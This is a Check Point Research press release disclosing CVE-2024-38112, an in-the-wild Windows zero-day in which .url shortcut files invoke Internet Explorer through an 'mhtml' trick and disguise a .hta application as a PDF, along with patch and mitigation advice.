CPR Warns Threat Actors are Leveraging Internet Explorer in New Zero-Day Spoofing Attack (CVE-2024-38112)

Check Point Research (CPR) warns of a new spoofing attack from threat actors using Internet Explorer shortcut files to lure Windows 10/11 users for remote code execution. CPR recommends Microsoft customers patch immediately.  

Key Findings

• Threat actors are luring Windows 10/11 users into enabling remote code execution and accessing their computers
• This vulnerability has been used in the wild for over one year, potentially impacting millions of users
• CPR disclosed the vulnerability to Microsoft in May 2024; Microsoft published patches on 9 July 2024
• CPR recommends users regularly patch and update all software to ensure greatest protection against cyber threats
• Check Point released the following protections on IPS and Harmony Email, IPS signature named “Internet Shortcut File Remote Code Execution” for customers months ahead of this publication, to protect against this zero-day attack.
• Harmony Email and Collaboration provides comprehensive inline protection against this zero-day attack at the highest security level.

Overview

Check Point Research recently discovered that threat actors have been using novel (or previously unknown) tricks to lure Windows users into enabling remote code execution.

Specifically, the attackers used special Windows Internet Shortcut files (.url extension name), which, when clicked, would call the retired Internet Explorer (IE) to visit the attacker-controlled URL. An additional trick on IE was used to hide the malicious “.hta” extension name. By opening the URL with IE instead of the modern and much more secure Chrome/Edge browser on Windows, the attacker gained significant advantages in exploiting the victim’s computer, although the computer is running the modern Windows 10/11 operating system.

Note, it’s not uncommon for threat actors to use .url files as an initial attack vector in their campaigns. Even using novel or zero-day url-file-related vulnerabilities has happened before—CVE-2023-36025, which was just patched last November, is a good example.

The malicious .url samples discovered by CPR could be dated back as early as January 2023 to May 13, 2024 and beyond. This suggests that threat actors have been using the attacking techniques for quite some time.

For the full analysis of this attack, visit the CPR blog.

Defense and Mitigation 

These exploitation tricks – which have been actively used in the wild for at least one year, work on the latest Windows 10/11 operating systems.

Check Point released the following protections on IPS and Harmony Email months ago to ensure customers remain protected: IPS signature named “Internet Shortcut File Remote Code Execution.” Windows users should immediately install the Microsoft patch.

Additionally, Harmony Email and Collaboration provides comprehensive inline protection against this zero-day attack at the highest security level.

Conclusion 

CPR recommends Windows users remain vigilant about .url files sent from untrusted sources. This tricky attack enables attackers to leverage IE (instead of the more secure Chrome/Edge browsers). It works in two ways

• The “mhtml” trick which allows the attacker to call (or resurrect) the IE browser
• Tricks the user into opening what they think is a PDF but is actually a dangerous .hta application

Check Point Research continues to monitor the activities related to this type of attack around the globe.